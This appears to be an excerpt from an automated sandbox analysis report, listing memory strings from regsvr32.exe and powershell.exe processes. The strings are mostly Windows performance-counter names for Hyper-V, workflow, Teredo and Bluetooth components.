Source: regsvr32.exe, 0000000E.00000003.101835729496.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838409957.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838372437.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101835764971.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101840971855.0000000003088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccessful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytesgga]
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipesows\
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processors2.sys
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionmunb3
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionvity
Source: regsvr32.exe, 0000000E.00000003.101834884718.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101834734505.0000000002F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Contex
Source: regsvr32.exe, 0000000E.00000003.101835729496.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101834255055.000000000306B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101835892541.0000000003069000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838409957.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101849833577.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101841368765.000000000306B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838372437.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101841221752.0000000003088000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101838685116.000000000306B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101834153989.0000000003031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848P
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisori
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipesJb
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000009.00000003.101720053485.0000000002B7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101711754873.0000000002B82000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101720170362.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Tr
Source: regsvr32.exe, 0000000E.00000003.101834631814.0000000002F59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101834336339.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101836256303.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101833974413.0000000002F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorP
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition.dll>$
Source: regsvr32.exe, 00000009.00000003.101712142747.0000000002B35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequenc
Source: regsvr32.exe, 00000009.00000003.101712472154.0000000002BBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: regsvr32.exe, 0000000E.00000003.101834840785.0000000002F31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctive Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost\"9
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partitionows\
Source: regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.00000000057BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys9
Source: regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.00000000057BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitiong
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorC<
Source: regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.00000000057BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processori
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionZ9uj
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisory
Source: regsvr32.exe, 00000009.00000003.101720363736.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101846931416.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 